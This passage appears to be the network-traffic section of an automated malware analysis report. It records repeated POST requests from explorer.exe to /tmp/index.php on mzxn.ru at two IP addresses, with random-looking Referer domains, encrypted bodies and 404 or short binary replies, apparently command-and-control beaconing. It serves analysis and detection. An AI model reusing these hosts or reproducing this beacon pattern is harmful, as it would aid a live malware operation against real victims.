                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                          Aug 6, 2024 14:49:04.209490061 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:03 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.44975958.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:11.723174095 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://srhunmufdtubiva.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 248
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:11.723174095 CEST248OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 5a eb ed
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu}Z]@YyRV$dT;b|6|4Bn'Q +o Qqg_@/?]ZP!r[7Xw}~rXU(,zo0W1
                          Aug 6, 2024 14:50:14.241234064 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:13 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.44976058.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:18.938966990 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jmoobswoyynvmcc.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 208
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:18.938990116 CEST208OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 1c c6 e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu&R[sfsae+?;ro-6%n=w5*R',N8Gm,w+%M
                          Aug 6, 2024 14:50:20.436502934 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:20 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.44976158.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:24.240449905 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nepghogipjla.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 261
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:24.240544081 CEST261OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 57 cc 99
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu|Wfjab"xBS-g`>gtl~5<H0EDA K-7un][t;qLYIb]icXf
                          Aug 6, 2024 14:50:25.754066944 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:25 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.44976258.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:29.423993111 CEST281OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://pomgyqmowolnyuhi.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 364
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:29.424031019 CEST364OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 57 be a9
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu#WNjp8fh/_or%8kDUII?}21EipL'iH%@_[!'N*aU7oaqHIwlA|#.Kk
                          Aug 6, 2024 14:50:30.906397104 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:30 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.44976358.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:34.508505106 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uxdwmdslnymyde.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 169
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:34.508505106 CEST169OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 0e c5 90
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuA^PuL{cH]Tz|?[|E[!:-~M9w\96/`zRO
                          Aug 6, 2024 14:50:36.064568996 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.44976458.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:39.740627050 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://idvimpvmdkks.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 303
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:39.740658998 CEST303OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 07 fa e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu<i~^hyF{<96n~'X+G>az*Jj.=f?=)bQzs#w\rN1,~+#?N[#]
                          Aug 6, 2024 14:50:41.268623114 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:40 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.44976558.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:44.946572065 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://bekxhhsmaopjub.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 293
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:44.946592093 CEST293OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 3c e1 9a
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vug<?hK%jPZwk<i?=<;@x}$~| 15|\LEA"TrNJIVd2tRCzVuZb/31
                          Aug 6, 2024 14:50:46.436702013 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:46 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.44976658.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:50.238221884 CEST281OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://gjmkiqrlvkslwsem.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 339
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:50.238255978 CEST339OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 5a af 87
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu8ZE/sNz.y%Vrfl1F)]qWL'rCE.ST$M"w`/BD\.&$ljOWM_bBh)4:#
                          Aug 6, 2024 14:50:51.716818094 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:51 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.449767190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:50:57.948179007 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://mgctvlvgdog.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 270
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:57.948189020 CEST270OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2f 38 c7 e4
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu/8P_m^}L52kA#gH])[|=9 1DIXC2C&cn2Q#VC(\!i#~<Lu5=N"2R
                          Aug 6, 2024 14:50:59.093554974 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:58 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.449768190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:03.083345890 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://keqkgetrekoo.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 118
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:03.083379030 CEST118OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 0c fd 8d
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu,]']F@Y?E4(oD)[
                          Aug 6, 2024 14:51:04.254211903 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:04 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.449769190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:08.417753935 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqvtaxxtrjbp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 229
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:08.417779922 CEST229OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2c 0f c5 bd
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu,=FQ&qsVc=KNsj@L#LCiALgt1D|Hyl6wVfyBU*L~'"B
                          Aug 6, 2024 14:51:09.566629887 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:09 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.449770190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:13.661300898 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ovdrqgaphhsrkg.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 348
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:13.661329985 CEST348OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 17 c5 9d
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vucRjkUh%XAr}jv"=VlC<7N~@\>6?ajD.4%*Z/F(K(4vtu?+jI.Jg
                          Aug 6, 2024 14:51:14.828363895 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:14 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.449771190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:18.705127954 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jgwoffhiempfd.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 130
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:18.705153942 CEST130OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 33 ee e4
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vus3r!B}lfSE]x+=cb/3
                          Aug 6, 2024 14:51:19.866970062 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:19 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.449772190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:23.501054049 CEST280OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://biwmwjkqpuwangh.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 143
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:23.504863024 CEST143OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 2b d8 82
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu-+QnHn:0\>}Dz7Y'9/n0|
                          Aug 6, 2024 14:51:24.925879002 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:24 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.449773190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:28.614402056 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ydamtofmlce.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 151
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:28.614447117 CEST151OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 40 fc a8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vu&@UP_Bf#&g_L0=Z"z@Aj MZ
                          Aug 6, 2024 14:51:29.790728092 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:29 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.449774190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:33.447446108 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yyvupavchggrcv.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 227
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:33.447487116 CEST227OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 07 a0 b5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vugT0jN6>#R>4]7K\NOY}7>zVEOOKCY6nWXJQTwC26
                          Aug 6, 2024 14:51:34.617417097 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:34 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.449775190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:38.919724941 CEST277OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://doftqgthwcaw.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 138
                          Host: mzxn.ru
                          Aug 6, 2024 14:51:38.919754028 CEST138OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 0b db bc
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuRR]s*D5=I5vF\
                          Aug 6, 2024 14:51:40.130624056 CEST151INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:51:39 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.449776190.187.52.42802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:51:44.320075035 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
